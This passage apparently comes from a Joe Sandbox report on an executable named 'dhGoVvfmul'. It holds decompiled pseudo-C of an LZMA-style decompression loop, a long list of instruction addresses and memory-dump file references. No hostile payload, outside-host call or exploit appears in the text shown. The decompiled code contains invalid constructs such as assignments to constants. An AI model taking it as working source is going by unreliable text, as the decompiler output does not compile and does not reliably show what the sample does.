                          											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                          											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          											_t484 = __ebp - 0x70;
                          											 *_t484 =  *(__ebp - 0x70) + 1;
                          											__eflags =  *_t484;
                          											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          											L148:
                          											_t487 = __ebp - 0x48;
                          											 *_t487 =  *(__ebp - 0x48) - 1;
                          											__eflags =  *_t487;
                          											L149:
                          											__eflags =  *(__ebp - 0x48);
                          											if( *(__ebp - 0x48) <= 0) {
                          												__ecx =  *(__ebp - 0x40);
                          												__ebx =  *(__ebp - 0x50);
                          												0 = 1;
                          												__eax = 1 << __cl;
                          												__ebx =  *(__ebp - 0x50) - (1 << __cl);
                          												__eax =  *(__ebp - 0x7c);
                          												 *(__ebp - 0x44) = __ebx;
                          												while(1) {
                          													 *(_t613 - 0x88) = _t533;
                          													goto L1;
                          												}
                          											}
                          											__eax =  *(__ebp - 0x50);
                          											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                          											__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                          											__eax =  *(__ebp - 0x58);
                          											__esi = __edx + __eax;
                          											 *(__ebp - 0x54) = __esi;
                          											__ax =  *__esi;
                          											__edi = __ax & 0x0000ffff;
                          											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                          											__eflags =  *(__ebp - 0xc) - __ecx;
                          											if( *(__ebp - 0xc) >= __ecx) {
                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                          												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                          												__cx = __ax;
                          												__cx = __ax >> 5;
                          												__eax = __eax - __ecx;
                          												__edx = __edx + 1;
                          												__eflags = __edx;
                          												 *__esi = __ax;
                          												 *(__ebp - 0x50) = __edx;
                          											} else {
                          												 *(__ebp - 0x10) = __ecx;
                          												0x800 = 0x800 - __edi;
                          												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                          												 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                          												 *__esi = __cx;
                          											}
                          											__eflags =  *(__ebp - 0x10) - 0x1000000;
                          											if( *(__ebp - 0x10) >= 0x1000000) {
                          												goto L148;
                          											} else {
                          												goto L146;
                          											}
                          										case 0x19:
                          											__eflags = __ebx - 4;
                          											if(__ebx < 4) {
                          												 *(__ebp - 0x2c) = __ebx;
                          												L119:
                          												_t393 = __ebp - 0x2c;
                          												 *_t393 =  *(__ebp - 0x2c) + 1;
                          												__eflags =  *_t393;
                          												L120:
                          												__eax =  *(__ebp - 0x2c);
                          												__eflags = __eax;
                          												if(__eax == 0) {
                          													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                          													goto L170;
                          												}
                          												__eflags = __eax -  *(__ebp - 0x60);
                          												if(__eax >  *(__ebp - 0x60)) {
                          													goto L171;
                          												}
                          												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                          												__eax =  *(__ebp - 0x30);
                          												_t400 = __ebp - 0x60;
                          												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                          												__eflags =  *_t400;
                          												goto L123;
                          											}
                          											__ecx = __ebx;
                          											__eax = __ebx;
                          											__ecx = __ebx >> 1;
                          											__eax = __ebx & 0x00000001;
                          											__ecx = (__ebx >> 1) - 1;
                          											__al = __al | 0x00000002;
                          											__eax = (__ebx & 0x00000001) << __cl;
                          											__eflags = __ebx - 0xe;
                          											 *(__ebp - 0x2c) = __eax;
                          											if(__ebx >= 0xe) {
                          												__ebx = 0;
                          												 *(__ebp - 0x48) = __ecx;
                          												L102:
                          												__eflags =  *(__ebp - 0x48);
                          												if( *(__ebp - 0x48) <= 0) {
                          													__eax = __eax + __ebx;
                          													 *(__ebp - 0x40) = 4;
                          													 *(__ebp - 0x2c) = __eax;
                          													__eax =  *(__ebp - 4);
                          													__eax =  *(__ebp - 4) + 0x644;
                          													__eflags = __eax;
                          													L108:
                          													__ebx = 0;
                          													 *(__ebp - 0x58) = __eax;
                          													 *(__ebp - 0x50) = 1;
                          													 *(__ebp - 0x44) = 0;
                          													 *(__ebp - 0x48) = 0;
                          													L112:
                          													__eax =  *(__ebp - 0x40);
                          													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                          													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                          														_t391 = __ebp - 0x2c;
                          														 *_t391 =  *(__ebp - 0x2c) + __ebx;
                          														__eflags =  *_t391;
                          														goto L119;
                          													}
                          													__eax =  *(__ebp - 0x50);
                          													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                          													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                          													__eax =  *(__ebp - 0x58);
                          													__esi = __edi + __eax;
                          													 *(__ebp - 0x54) = __esi;
                          													__ax =  *__esi;
                          													__ecx = __ax & 0x0000ffff;
                          													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                          													__eflags =  *(__ebp - 0xc) - __edx;
                          													if( *(__ebp - 0xc) >= __edx) {
                          														__ecx = 0;
                          														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                          														__ecx = 1;
                          														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                          														__ebx = 1;
                          														__ecx =  *(__ebp - 0x48);
                          														__ebx = 1 << __cl;
                          														__ecx = 1 << __cl;
                          														__ebx =  *(__ebp - 0x44);
                          														__ebx =  *(__ebp - 0x44) | __ecx;
                          														__cx = __ax;
                          														__cx = __ax >> 5;
                          														__eax = __eax - __ecx;
                          														__edi = __edi + 1;
                          														__eflags = __edi;
                          														 *(__ebp - 0x44) = __ebx;
                          														 *__esi = __ax;
                          														 *(__ebp - 0x50) = __edi;
                          													} else {
                          														 *(__ebp - 0x10) = __edx;
                          														0x800 = 0x800 - __ecx;
                          														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                          														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                          														 *__esi = __dx;
                          													}
                          													__eflags =  *(__ebp - 0x10) - 0x1000000;
                          													if( *(__ebp - 0x10) >= 0x1000000) {
                          														L111:
                          														_t368 = __ebp - 0x48;
                          														 *_t368 =  *(__ebp - 0x48) + 1;
                          														__eflags =  *_t368;
                          														goto L112;
                          													} else {
                          														goto L109;
                          													}
                          												}
                          												__ecx =  *(__ebp - 0xc);
                          												__ebx = __ebx + __ebx;
                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                          												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                          												 *(__ebp - 0x44) = __ebx;
                          												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                          													__ecx =  *(__ebp - 0x10);
                          													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                          													__ebx = __ebx | 0x00000001;
                          													__eflags = __ebx;
                          													 *(__ebp - 0x44) = __ebx;
                          												}
                          												__eflags =  *(__ebp - 0x10) - 0x1000000;
                          												if( *(__ebp - 0x10) >= 0x1000000) {
                          													L101:
                          													_t338 = __ebp - 0x48;
                          													 *_t338 =  *(__ebp - 0x48) - 1;
                          													__eflags =  *_t338;
                          													goto L102;
                          												} else {
                          													goto L99;
                          												}
                          											}
                          											__edx =  *(__ebp - 4);
                          											__eax = __eax - __ebx;
                          											 *(__ebp - 0x40) = __ecx;
                          											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                          											goto L108;
                          										case 0x1a:
                          											L56:
                          											__eflags =  *(__ebp - 0x64);
                          											if( *(__ebp - 0x64) == 0) {
                          												 *(__ebp - 0x88) = 0x1a;
                          												goto L170;
                          											}
                          											__ecx =  *(__ebp - 0x68);
                          											__al =  *(__ebp - 0x5c);
                          											__edx =  *(__ebp - 8);
                          											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                          											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                          											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                          											 *( *(__ebp - 0x68)) = __al;
                          											__ecx =  *(__ebp - 0x14);
                          											 *(__ecx +  *(__ebp - 8)) = __al;
                          											__eax = __ecx + 1;
                          											__edx = 0;
                          											_t192 = __eax %  *(__ebp - 0x74);
                          											__eax = __eax /  *(__ebp - 0x74);
                          											__edx = _t192;
                          											goto L79;
                          										case 0x1b:
                          											L75:
                          											__eflags =  *(__ebp - 0x64);
                          											if( *(__ebp - 0x64) == 0) {
                          												 *(__ebp - 0x88) = 0x1b;
                          												goto L170;
                          											}
                          											__eax =  *(__ebp - 0x14);
                          											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                          											__eflags = __eax -  *(__ebp - 0x74);
                          											if(__eax >=  *(__ebp - 0x74)) {
                          												__eax = __eax +  *(__ebp - 0x74);
                          												__eflags = __eax;
                          											}
                          											__edx =  *(__ebp - 8);
                          											__cl =  *(__eax + __edx);
                          											__eax =  *(__ebp - 0x14);
                          											 *(__ebp - 0x5c) = __cl;
                          											 *(__eax + __edx) = __cl;
                          											__eax = __eax + 1;
                          											__edx = 0;
                          											_t274 = __eax %  *(__ebp - 0x74);
                          											__eax = __eax /  *(__ebp - 0x74);
                          											__edx = _t274;
                          											__eax =  *(__ebp - 0x68);
                          											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                          											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                          											_t283 = __ebp - 0x64;
                          											 *_t283 =  *(__ebp - 0x64) - 1;
                          											__eflags =  *_t283;
                          											 *( *(__ebp - 0x68)) = __cl;
                          											L79:
                          											 *(__ebp - 0x14) = __edx;
                          											goto L80;
                          										case 0x1c:
                          											while(1) {
                          												L123:
                          												__eflags =  *(__ebp - 0x64);
                          												if( *(__ebp - 0x64) == 0) {
                          													break;
                          												}
                          												__eax =  *(__ebp - 0x14);
                          												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                          												__eflags = __eax -  *(__ebp - 0x74);
                          												if(__eax >=  *(__ebp - 0x74)) {
                          													__eax = __eax +  *(__ebp - 0x74);
                          													__eflags = __eax;
                          												}
                          												__edx =  *(__ebp - 8);
                          												__cl =  *(__eax + __edx);
                          												__eax =  *(__ebp - 0x14);
                          												 *(__ebp - 0x5c) = __cl;
                          												 *(__eax + __edx) = __cl;
                          												__eax = __eax + 1;
                          												__edx = 0;
                          												_t414 = __eax %  *(__ebp - 0x74);
                          												__eax = __eax /  *(__ebp - 0x74);
                          												__edx = _t414;
                          												__eax =  *(__ebp - 0x68);
                          												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                          												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                          												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                          												__eflags =  *(__ebp - 0x30);
                          												 *( *(__ebp - 0x68)) = __cl;
                          												 *(__ebp - 0x14) = _t414;
                          												if( *(__ebp - 0x30) > 0) {
                          													continue;
                          												} else {
                          													L80:
                          													 *(__ebp - 0x88) = 2;
                          													goto L1;
                          												}
                          											}
                          											 *(__ebp - 0x88) = 0x1c;
                          											goto L170;
                          									}
                          								}
                          								L171:
                          								_t535 = _t534 | 0xffffffff;
                          								goto L172;
                          							}
                          						}
                          					}
                          				}
                          			}













                          0x00000000
                          0x00406f07
                          0x00406f07
                          0x00406f0b
                          0x00406f34
                          0x00406f3e
                          0x00406f0d
                          0x00406f16
                          0x00406f23
                          0x00406f26
                          0x0040726a
                          0x0040726a
                          0x0040726d
                          0x0040726d
                          0x0040726d
                          0x00407273
                          0x00407279
                          0x0040727f
                          0x00407299
                          0x0040729c
                          0x004072a2
                          0x004072ad
                          0x004072af
                          0x00407281
                          0x00407281
                          0x00407290
                          0x00407294
                          0x00407294
                          0x004072b9
                          0x00000000
                          0x00000000
                          0x004072bb
                          0x004072bf
                          0x0040746e
                          0x00407484
                          0x0040748c
                          0x00407493
                          0x00407495
                          0x0040749c
                          0x004074a0
                          0x004074a0
                          0x004072cb
                          0x004072d2
                          0x004072da
                          0x004072dd
                          0x004072e0
                          0x004072e0
                          0x004072e6
                          0x004072e6
                          0x00406a82
                          0x00406a82
                          0x00406a82
                          0x00406a8b
                          0x00000000
                          0x00000000
                          0x00406a91
                          0x00000000
                          0x00406a9c
                          0x00000000
                          0x00000000
                          0x00406aa5
                          0x00406aa8
                          0x00406aab
                          0x00406aaf
                          0x00000000
                          0x00000000
                          0x00406ab5
                          0x00406ab8
                          0x00406aba
                          0x00406abb
                          0x00406abe
                          0x00406ac0
                          0x00406ac1
                          0x00406ac3
                          0x00406ac6
                          0x00406acb
                          0x00406ad0
                          0x00406ad9
                          0x00406aec
                          0x00406aef
                          0x00406afb
                          0x00406b23
                          0x00406b25
                          0x00406b33
                          0x00406b33
                          0x00406b37
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00406b27
                          0x00406b27
                          0x00406b2a
                          0x00406b2b
                          0x00406b2b
                          0x00000000
                          0x00406b27
                          0x00406b01
                          0x00406b06
                          0x00406b06
                          0x00406b0f
                          0x00406b17
                          0x00406b1a
                          0x00000000
                          0x00406b20
                          0x00406b20
                          0x00000000
                          0x00406b20
                          0x00000000
                          0x00406b3d
                          0x00406b3d
                          0x00406b41
                          0x004073ed
                          0x00000000
                          0x004073ed
                          0x00406b4a
                          0x00406b5a
                          0x00406b5d
                          0x00406b60
                          0x00406b60
                          0x00406b60
                          0x00406b63
                          0x00406b67
                          0x00000000
                          0x00000000
                          0x00406b69
                          0x00406b6f
                          0x00406b99
                          0x00406b9f
                          0x00406ba6
                          0x00000000
                          0x00406ba6
                          0x00406b75
                          0x00406b78
                          0x00406b7d
                          0x00406b7d
                          0x00406b88
                          0x00406b90
                          0x00406b93
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00406bd8
                          0x00406bde
                          0x00406be1
                          0x00406bee
                          0x00406bf6
                          0x0040726a
                          0x00000000
                          0x00000000
                          0x00406bad
                          0x00406bad
                          0x00406bb1
                          0x004073fc
                          0x00000000
                          0x004073fc
                          0x00406bbd
                          0x00406bc8
                          0x00406bc8
                          0x00406bc8
                          0x00406bcb
                          0x00406bce
                          0x00406bd1
                          0x00406bd6
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x0040726d
                          0x0040726d
                          0x00407273
                          0x00407279
                          0x0040727f
                          0x00407299
                          0x0040729c
                          0x004072a2
                          0x004072ad
                          0x004072af
                          0x00407281
                          0x00407281
                          0x00407290
                          0x00407294
                          0x00407294
                          0x004072b9
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00406bfe
                          0x00406c00
                          0x00406c03
                          0x00406c74
                          0x00406c77
                          0x00406c7a
                          0x00406c81
                          0x00406c8b
                          0x0040726a
                          0x0040726a
                          0x00000000
                          0x0040726a
                          0x0040726a
                          0x00406c05
                          0x00406c09
                          0x00406c0c
                          0x00406c0e
                          0x00406c11
                          0x00406c14
                          0x00406c16
                          0x00406c19
                          0x00406c1b
                          0x00406c20
                          0x00406c23
                          0x00406c26
                          0x00406c2a
                          0x00406c31
                          0x00406c34
                          0x00406c3b
                          0x00406c3f
                          0x00406c47
                          0x00406c47
                          0x00406c47
                          0x00406c41
                          0x00406c41
                          0x00406c41
                          0x00406c36
                          0x00406c36
                          0x00406c36
                          0x00406c4b
                          0x00406c4e
                          0x00406c6c
                          0x00406c6e
                          0x00000000
                          0x00406c50
                          0x00406c50
                          0x00406c53
                          0x00406c56
                          0x00406c59
                          0x00406c5b
                          0x00406c5b
                          0x00406c5b
                          0x00406c5e
                          0x00406c61
                          0x00406c63
                          0x00406c64
                          0x00406c67
                          0x00000000
                          0x00406c67
                          0x00000000
                          0x00406e9d
                          0x00406ea1
                          0x00406ebf
                          0x00406ec2
                          0x00406ec9
                          0x00406ecc
                          0x00406ecf
                          0x00406ed2
                          0x00406ed5
                          0x00406ed8
                          0x00406eda
                          0x00406ee1
                          0x00406ee2
                          0x00406ee4
                          0x00406ee7
                          0x00406eea
                          0x00406eed
                          0x00406eed
                          0x00406ef2
                          0x00000000
                          0x00406ef2
                          0x00406ea3
                          0x00406ea6
                          0x00406ea9
                          0x00406eb3
                          0x0040726a
                          0x0040726a
                          0x00000000
                          0x0040726a
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00406f4a
                          0x00406f4e
                          0x00000000
                          0x00000000
                          0x00406f54
                          0x00406f58
                          0x00000000
                          0x00000000
                          0x00406f5e
                          0x00406f60
                          0x00406f64
                          0x00406f64
                          0x00406f67
                          0x00406f6b
                          0x00000000
                          0x00000000
                          0x00406fbb
                          0x00406fbf
                          0x00406fc6
                          0x00406fc9
                          0x00406fcc
                          0x00406fd6
                          0x0040726a
                          0x0040726a
                          0x00000000
                          0x0040726a
                          0x0040726a
                          0x00406fc1
                          0x00000000
                          0x00000000
                          0x00406fe2
                          0x00406fe6
                          0x00406fed
                          0x00406ff0
                          0x00406ff3
                          0x00406fe8
                          0x00406fe8
                          0x00406fe8
                          0x00406ff6
                          0x00406ff9
                          0x00406ffc
                          0x00406ffc
                          0x00406fff
                          0x00407002
                          0x00407005
                          0x00407005
                          0x00407008
                          0x0040700f
                          0x00407014
                          0x00000000
                          0x00000000
                          0x004070a2
                          0x004070a2
                          0x004070a6
                          0x00407444
                          0x00000000
                          0x00407444
                          0x004070ac
                          0x004070af
                          0x004070b2
                          0x004070b6
                          0x004070b9
                          0x004070bf
                          0x004070c1
                          0x004070c1
                          0x004070c1
                          0x004070c4
                          0x004070c7
                          0x00000000
                          0x00000000
                          0x00406c97
                          0x00406c97
                          0x00406c9b
                          0x00407408
                          0x00000000
                          0x00407408
                          0x00406ca1
                          0x00406ca4
                          0x00406ca7
                          0x00406cab
                          0x00406cae
                          0x00406cb4
                          0x00406cb6
                          0x00406cb6
                          0x00406cb6
                          0x00406cb9
                          0x00406cbc
                          0x00406cbc
                          0x00406cbf
                          0x00406cc2
                          0x00000000
                          0x00000000
                          0x00406cc8
                          0x00406cce
                          0x00000000
                          0x00000000
                          0x00406cd4
                          0x00406cd4
                          0x00406cd8
                          0x00406cdb
                          0x00406cde
                          0x00406ce1
                          0x00406ce4
                          0x00406ce5
                          0x00406ce8
                          0x00406cea
                          0x00406cf0
                          0x00406cf3
                          0x00406cf6
                          0x00406cf9
                          0x00406cfc
                          0x00406cff
                          0x00406d02
                          0x00406d1e
                          0x00406d21
                          0x00406d24
                          0x00406d27
                          0x00406d2e
                          0x00406d32
                          0x00406d34
                          0x00406d38
                          0x00406d04
                          0x00406d04
                          0x00406d08
                          0x00406d10
                          0x00406d15
                          0x00406d17
                          0x00406d19
                          0x00406d19
                          0x00406d3b
                          0x00406d42
                          0x00406d45
                          0x00000000
                          0x00406d4b
                          0x00000000
                          0x00406d4b
                          0x00000000
                          0x00406d50
                          0x00406d50
                          0x00406d54
                          0x00407414
                          0x00000000
                          0x00407414
                          0x00406d5a
                          0x00406d5d
                          0x00406d60
                          0x00406d64
                          0x00406d67
                          0x00406d6d
                          0x00406d6f
                          0x00406d6f
                          0x00406d6f
                          0x00406d72
                          0x00406d75
                          0x00406d75
                          0x00406d75
                          0x00406d7b
                          0x00000000
                          0x00000000
                          0x00406d7d
                          0x00406d80
                          0x00406d83
                          0x00406d86
                          0x00406d89
                          0x00406d8c
                          0x00406d8f
                          0x00406d92
                          0x00406d95
                          0x00406d98
                          0x00406d9b
                          0x00406db3
                          0x00406db6
                          0x00406db9
                          0x00406dbc
                          0x00406dbc
                          0x00406dbf
                          0x00406dc3
                          0x00406dc5
                          0x00406d9d
                          0x00406d9d
                          0x00406da5
                          0x00406daa
                          0x00406dac
                          0x00406dae
                          0x00406dae
                          0x00406dc8
                          0x00406dcf
                          0x00406dd2
                          0x00000000
                          0x00406dd4
                          0x00000000
                          0x00406dd4
                          0x00406dd2
                          0x00406dd9
                          0x00406dd9
                          0x00406dd9
                          0x00406dd9
                          0x00000000
                          0x00000000
                          0x00406e14
                          0x00406e14
                          0x00406e18
                          0x00407420
                          0x00000000
                          0x00407420
                          0x00406e1e
                          0x00406e21
                          0x00406e24
                          0x00406e28
                          0x00406e2b
                          0x00406e31
                          0x00406e33
                          0x00406e33
                          0x00406e33
                          0x00406e36
                          0x00406e39
                          0x00406e39
                          0x00406e3f
                          0x00406ddd
                          0x00406ddd
                          0x00406de0
                          0x00000000
                          0x00406de0
                          0x00406e41
                          0x00406e41
                          0x00406e44
                          0x00406e47
                          0x00406e4a
                          0x00406e4d
                          0x00406e50
                          0x00406e53
                          0x00406e56
                          0x00406e59
                          0x00406e5c
                          0x00406e5f
                          0x00406e77
                          0x00406e7a
                          0x00406e7d
                          0x00406e80
                          0x00406e80
                          0x00406e83
                          0x00406e87
                          0x00406e89
                          0x00406e61
                          0x00406e61
                          0x00406e69
                          0x00406e6e
                          0x00406e70
                          0x00406e72
                          0x00406e72
                          0x00406e8c
                          0x00406e93
                          0x00406e96
                          0x00000000
                          0x00406e98
                          0x00000000
                          0x00406e98
                          0x00000000
                          0x00407125
                          0x00407125
                          0x00407129
                          0x00407450
                          0x00000000
                          0x00407450
                          0x0040712f
                          0x00407132
                          0x00407135
                          0x00407139
                          0x0040713c
                          0x00407142
                          0x00407144
                          0x00407144
                          0x00407144
                          0x00407147
                          0x00000000
                          0x00000000
                          0x00406ef5
                          0x00406ef5
                          0x00406ef8
                          0x0040726a
                          0x0040726a
                          0x00000000
                          0x0040726a
                          0x00000000
                          0x00407234
                          0x00407238
                          0x0040725a
                          0x0040725d
                          0x00407267
                          0x0040726a
                          0x0040726a
                          0x00000000
                          0x0040726a
                          0x0040726a
                          0x0040723a
                          0x0040723d
                          0x00407241
                          0x00407244
                          0x00407244
                          0x00407247
                          0x00000000
                          0x00000000
                          0x004072f1
                          0x004072f5
                          0x00407313
                          0x00407313
                          0x00407313
                          0x0040731a
                          0x00407321
                          0x00407328
                          0x00407328
                          0x00000000
                          0x00407328
                          0x004072f7
                          0x004072fa
                          0x004072fd
                          0x00407300
                          0x00407307
                          0x0040724b
                          0x0040724b
                          0x0040724e
                          0x00000000
                          0x00000000
                          0x004073e2
                          0x004073e5
                          0x004072e6
                          0x00000000
                          0x00000000
                          0x0040701c
                          0x0040701e
                          0x00407025
                          0x00407026
                          0x00407028
                          0x0040702b
                          0x00000000
                          0x00000000
                          0x00407033
                          0x00407036
                          0x00407039
                          0x0040703b
                          0x0040703d
                          0x0040703d
                          0x0040703e
                          0x00407041
                          0x00407048
                          0x0040704b
                          0x00407059
                          0x00000000
                          0x00000000
                          0x0040732f
                          0x0040732f
                          0x00407332
                          0x00407339
                          0x00000000
                          0x00000000
                          0x0040733e
                          0x0040733e
                          0x00407342
                          0x0040747a
                          0x00000000
                          0x0040747a
                          0x00407348
                          0x0040734b
                          0x0040734e
                          0x00407352
                          0x00407355
                          0x0040735b
                          0x0040735d
                          0x0040735d
                          0x0040735d
                          0x00407360
                          0x00407363
                          0x00407363
                          0x00407363
                          0x00407363
                          0x00407366
                          0x00407366
                          0x0040736a
                          0x004073ca
                          0x004073cd
                          0x004073d2
                          0x004073d3
                          0x004073d5
                          0x004073d7
                          0x004073da
                          0x004072e6
                          0x004072e6
                          0x00000000
                          0x004072ec
                          0x004072e6
                          0x0040736c
                          0x00407372
                          0x00407375
                          0x00407378
                          0x0040737b
                          0x0040737e
                          0x00407381
                          0x00407384
                          0x00407387
                          0x0040738a
                          0x0040738d
                          0x004073a6
                          0x004073a9
                          0x004073ac
                          0x004073af
                          0x004073b3
                          0x004073b5
                          0x004073b5
                          0x004073b6
                          0x004073b9
                          0x0040738f
                          0x0040738f
                          0x00407397
                          0x0040739c
                          0x0040739e
                          0x004073a1
                          0x004073a1
                          0x004073bc
                          0x004073c3
                          0x00000000
                          0x004073c5
                          0x00000000
                          0x004073c5
                          0x00000000
                          0x00407061
                          0x00407064
                          0x0040709a
                          0x004071ca
                          0x004071ca
                          0x004071ca
                          0x004071ca
                          0x004071cd
                          0x004071cd
                          0x004071d0
                          0x004071d2
                          0x0040745c
                          0x00000000
                          0x0040745c
                          0x004071d8
                          0x004071db
                          0x00000000
                          0x00000000
                          0x004071e1
                          0x004071e5
                          0x004071e8
                          0x004071e8
                          0x004071e8
                          0x00000000
                          0x004071e8
                          0x00407066
                          0x00407068
                          0x0040706a
                          0x0040706c
                          0x0040706f
                          0x00407070
                          0x00407072
                          0x00407074
                          0x00407077
                          0x0040707a
                          0x00407090
                          0x00407095
                          0x004070cd
                          0x004070cd
                          0x004070d1
                          0x004070fd
                          0x004070ff
                          0x00407106
                          0x00407109
                          0x0040710c
                          0x0040710c
                          0x00407111
                          0x00407111
                          0x00407113
                          0x00407116
                          0x0040711d
                          0x00407120
                          0x0040714d
                          0x0040714d
                          0x00407150
                          0x00407153
                          0x004071c7
                          0x004071c7
                          0x004071c7
                          0x00000000
                          0x004071c7
                          0x00407155
                          0x0040715b
                          0x0040715e
                          0x00407161
                          0x00407164
                          0x00407167
                          0x0040716a
                          0x0040716d
                          0x00407170
                          0x00407173
                          0x00407176
                          0x0040718f
                          0x00407191
                          0x00407194
                          0x00407195
                          0x00407198
                          0x0040719a
                          0x0040719d
                          0x0040719f
                          0x004071a1
                          0x004071a4
                          0x004071a6
                          0x004071a9
                          0x004071ad
                          0x004071af
                          0x004071af
                          0x004071b0
                          0x004071b3
                          0x004071b6
                          0x00407178
                          0x00407178
                          0x00407180
                          0x00407185
                          0x00407187
                          0x0040718a
                          0x0040718a
                          0x004071b9
                          0x004071c0
                          0x0040714a
                          0x0040714a
                          0x0040714a
                          0x0040714a
                          0x00000000
                          0x004071c2
                          0x00000000
                          0x004071c2
                          0x004071c0
                          0x004070d3
                          0x004070d6
                          0x004070d8
                          0x004070db
                          0x004070de
                          0x004070e1
                          0x004070e3
                          0x004070e6
                          0x004070e9
                          0x004070e9
                          0x004070ec
                          0x004070ec
                          0x004070ef
                          0x004070f6
                          0x004070ca
                          0x004070ca
                          0x004070ca
                          0x004070ca
                          0x00000000
                          0x004070f8
                          0x00000000
                          0x004070f8
                          0x004070f6
                          0x0040707c
                          0x0040707f
                          0x00407081
                          0x00407084
                          0x00000000
                          0x00000000
                          0x00406de3
                          0x00406de3
                          0x00406de7
                          0x0040742c
                          0x00000000
                          0x0040742c
                          0x00406ded
                          0x00406df0
                          0x00406df3
                          0x00406df6
                          0x00406df9
                          0x00406dfc
                          0x00406dff
                          0x00406e01
                          0x00406e04
                          0x00406e07
                          0x00406e0a
                          0x00406e0c
                          0x00406e0c
                          0x00406e0c
                          0x00000000
                          0x00000000
                          0x00406f6e
                          0x00406f6e
                          0x00406f72
                          0x00407438
                          0x00000000
                          0x00407438
                          0x00406f78
                          0x00406f7b
                          0x00406f7e
                          0x00406f81
                          0x00406f83
                          0x00406f83
                          0x00406f83
                          0x00406f86
                          0x00406f89
                          0x00406f8c
                          0x00406f8f
                          0x00406f92
                          0x00406f95
                          0x00406f96
                          0x00406f98
                          0x00406f98
                          0x00406f98
                          0x00406f9b
                          0x00406f9e
                          0x00406fa1
                          0x00406fa4
                          0x00406fa4
                          0x00406fa4
                          0x00406fa7
                          0x00406fa9
                          0x00406fa9
                          0x00000000
                          0x00000000
                          0x004071eb
                          0x004071eb
                          0x004071eb
                          0x004071ef
                          0x00000000
                          0x00000000
                          0x004071f5
                          0x004071f8
                          0x004071fb
                          0x004071fe
                          0x00407200
                          0x00407200
                          0x00407200
                          0x00407203
                          0x00407206
                          0x00407209
                          0x0040720c
                          0x0040720f
                          0x00407212
                          0x00407213
                          0x00407215
                          0x00407215
                          0x00407215
                          0x00407218
                          0x0040721b
                          0x0040721e
                          0x00407221
                          0x00407224
                          0x00407228
                          0x0040722a
                          0x0040722d
                          0x00000000
                          0x0040722f
                          0x00406fac
                          0x00406fac
                          0x00000000
                          0x00406fac
                          0x0040722d
                          0x00407462
                          0x00000000
                          0x00000000
                          0x00406a91
                          0x00407499
                          0x00407499
                          0x00000000
                          0x00407499
                          0x004072e6
                          0x0040726d
                          0x0040726a

                          Memory Dump Source
                          • Source File: 00000000.00000002.272825833.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.272822223.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272839095.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272843221.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272863409.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272868401.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272878674.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272884650.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272891964.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272896993.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272906493.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_dhGoVvfmul.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 387721db96078c788ef05d401c52d1705cfc64557ecb0b14db2e4703a56ba408
